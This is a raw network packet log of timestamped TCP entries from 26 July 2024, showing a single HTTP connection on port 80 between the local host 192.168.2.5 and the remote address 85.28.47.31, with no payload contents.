Jul 26, 2024 20:09:12.925704956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925754070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.925924063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925968885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.925987005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926022053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926106930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926171064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926254034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926284075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926314116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926333904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926398039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926455021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926461935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926517010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926521063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926569939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926583052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926620007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926680088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926740885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926748991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926805973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926867008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926924944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.926929951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.926989079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.927012920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.927074909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.927119970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.927184105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.927237988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.927279949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.927308083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.927326918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.927762032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.927833080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017043114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017066956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017091990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017107010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017122030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017137051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017158031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017208099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017241001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017348051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017362118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017364025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017379999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017405033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017425060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017440081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017442942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017457008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017491102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017505884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017658949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017673969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017689943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017705917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017720938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017762899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017827988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017843008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017857075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017874002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017890930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017916918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017918110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017931938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017961025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.017962933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017980099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.017988920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018019915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018021107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018038988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018048048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018085003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018091917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018105030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018142939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018471003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018486977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018501043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018522978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018531084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018553972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018558979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018575907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018589020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018616915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018733978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018829107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018843889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018860102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018876076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018896103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018899918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018918037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018923998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018953085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018956900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018968105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018978119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018984079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.018996954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.018999100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019013882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019017935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019030094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019037008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019052029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019082069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019090891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019098043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019114017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019129992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019218922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019218922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019218922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019220114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019220114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019911051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019927979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019942045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019957066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019959927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019970894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019975901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.019987106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.019990921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020003080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020014048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020018101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020032883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020040989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020047903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020061970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020062923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020077944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020090103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020092964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020108938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020114899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020126104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020134926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020140886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020157099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020169020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020195961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020850897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020865917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020873070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020888090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020900965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020904064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020916939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020919085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020935059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020942926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020951033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020965099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020967007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020982027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.020987988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.020996094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021011114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021018028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021025896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021028996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021042109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021058083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021061897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021080017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021100998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021802902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021819115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021833897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021848917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021857977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021862030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021867990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021877050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021892071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021893024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021907091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021917105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021922112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021941900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021949053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021956921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021961927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021975040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.021986008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.021990061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022000074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022005081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022020102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022023916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022036076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022042036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022070885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022083044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022705078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022721052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022736073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022751093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022758961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022766113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022777081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022779942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022794962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022802114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022810936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022825956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022830963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022841930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022852898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022852898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022857904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022865057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022872925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022886992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022891998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022897959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022902012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.022918940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022933960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.022948027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110436916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110455990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110471964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110496998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110512972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110596895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110613108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110630989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110642910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110646963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110662937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110670090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110702991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110713005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110802889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110819101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110833883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110843897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110858917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110862017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110873938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110882044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110889912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.110897064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110913992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.110930920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111107111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111121893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111138105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111149073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111154079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111170053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111175060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111185074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111192942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111201048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111216068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111233950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111251116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111752033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111769915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111784935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111803055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111807108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111818075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111826897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111834049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111849070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111855030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111864090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111879110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111880064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111907005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111907959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111924887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111926079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111939907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111946106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111963987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111967087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111974955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.111982107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.111999035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112006903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112014055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112023115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112036943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112037897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112054110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112056971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112071037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112080097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112086058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112091064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112102032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112109900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112123013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112142086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112457037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112477064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112504005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112509966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112524033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112524986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112540007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112551928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112555981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112571955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112571955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112586021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112586021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112596989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112601995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112617016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112621069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112632036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112634897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112658024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112675905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.112867117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.112912893 CEST	49704	80	192.168.2.5	85.28.47.31
